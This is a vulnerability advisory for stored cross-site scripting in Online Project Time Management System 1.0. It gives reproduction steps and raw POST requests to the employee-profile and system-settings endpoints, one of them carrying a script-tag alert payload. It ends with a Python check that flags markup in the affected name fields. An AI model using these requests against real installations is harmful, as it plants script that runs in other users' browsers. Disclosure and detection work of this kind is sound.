Online Project Time Management System 1.0 – Multiple Stored Cross Site Scripting (XSS) (Authenticated)

  • Author: Felipe Alcantara
    Date: 2022-01-25
  • Category:
  • Source:

    # Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
    # Date: 19/01/2022
    # Exploit Author: Felipe Alcantara (Filiplain)
    # Vendor Homepage:
    # Software Link:
    # Version: 1.0
    # Tested on: Kali Linux
    # Description: Stored XSS in multiple fields...
    # Steps to reproduce (with employee Access)
    # Log in as an employee
    # Go to: http://localhost/ptms/?page=user
    # Add XSS payload to any field of the user's name.
    # Click Update
    POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
    Host: localhost
    Content-Length: 1339
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
    Origin: http://localhost
    Referer: http://localhost/ptms/?page=user
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
    Connection: close
    Content-Disposition: form-data; name="id"
    Content-Disposition: form-data; name="code"
    Content-Disposition: form-data; name="generated_password"
    Content-Disposition: form-data; name="firstname"
    Content-Disposition: form-data; name="middlename"
    Content-Disposition: form-data; name="lastname"
    Content-Disposition: form-data; name="gender"
    Content-Disposition: form-data; name="department"
    IT Department
    Content-Disposition: form-data; name="position"
    Department Manager
    Content-Disposition: form-data; name="email"
    Content-Disposition: form-data; name="password"
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    # Steps to reproduce (with Admin access)
    # Log in to the admin panel
    # Go to: http://localhost/ptms/admin/?page=system_info
    # Add XSS payload to the 'System Name' field
    # Click Update
    POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 603
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
    Origin: http://localhost
    Referer: http://localhost/ptms/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
    Connection: close
    Content-Disposition: form-data; name="name"
    Online Project Time Management System - PHP <script>alert("XSS")</script>
    Content-Disposition: form-data; name="short_name"
    PTMS - PHP
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    Content-Disposition: form-data; name="cover"; filename=""
    Content-Type: application/octet-stream
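As an added, defensive example that is not part of the advisory or the PTMS code base: a Python check that parses a multipart/form-data request like the two above and flags the name fields the advisory identifies (employee first/middle/last name, system name and short name) when they carry markup, so a proxy or log review can catch the write before it is stored. The boundary, field names and the sample payload are taken from the advisory; the request body itself is constructed here, and the field list and pattern are assumptions.

```python
"""Flag HTML/script markup in PTMS name fields posted via multipart/form-data."""
import re
from email import message_from_bytes
from email.policy import default

# Fields the advisory reports as stored and rendered unescaped (assumed list).
WATCHED_FIELDS = {"firstname", "middlename", "lastname", "name", "short_name"}

# Tags, javascript: URLs and inline event handlers have no place in a display
# name. "on[a-z]+=" can false-positive on prose; acceptable for a name field.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z][^>]*>|javascript\s*:|\bon[a-z]+\s*=", re.I)


def flagged_fields(content_type: str, body: bytes) -> dict:
    """Return {field: value} for watched form fields whose value contains markup."""
    # Reuse the stdlib MIME parser: prepend the Content-Type header (with the
    # boundary) so the body is parsed as a multipart message.
    msg = message_from_bytes(
        f"Content-Type: {content_type}\r\n\r\n".encode() + body, policy=default
    )
    hits = {}
    if not msg.is_multipart():
        return hits
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        if name not in WATCHED_FIELDS:
            continue  # file parts (img, cover) and untracked fields are skipped
        value = part.get_content()  # text part without Content-Type -> str
        if SUSPICIOUS.search(value):
            hits[name] = value.strip()
    return hits


def build_body(boundary: str, fields: dict) -> bytes:
    """Build a browser-style multipart/form-data body (constructed sample)."""
    out = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
        for n, v in fields.items()
    ]
    out.append(f"--{boundary}--\r\n")
    return "".join(out).encode()


# Boundary and values modelled on the update_settings request in the advisory.
BOUNDARY = "----WebKitFormBoundaryCibB6pEzThjb4Zcq"
SAMPLE_FIELDS = {
    "name": 'Online Project Time Management System - PHP <script>alert("XSS")</script>',
    "short_name": "PTMS - PHP",
}


def demo() -> dict:
    """Run the check over the constructed update_settings request body."""
    ct = f"multipart/form-data; boundary={BOUNDARY}"
    return flagged_fields(ct, build_body(BOUNDARY, SAMPLE_FIELDS))
```

Only the `name` field is reported for the sample; `short_name` carries plain text and passes.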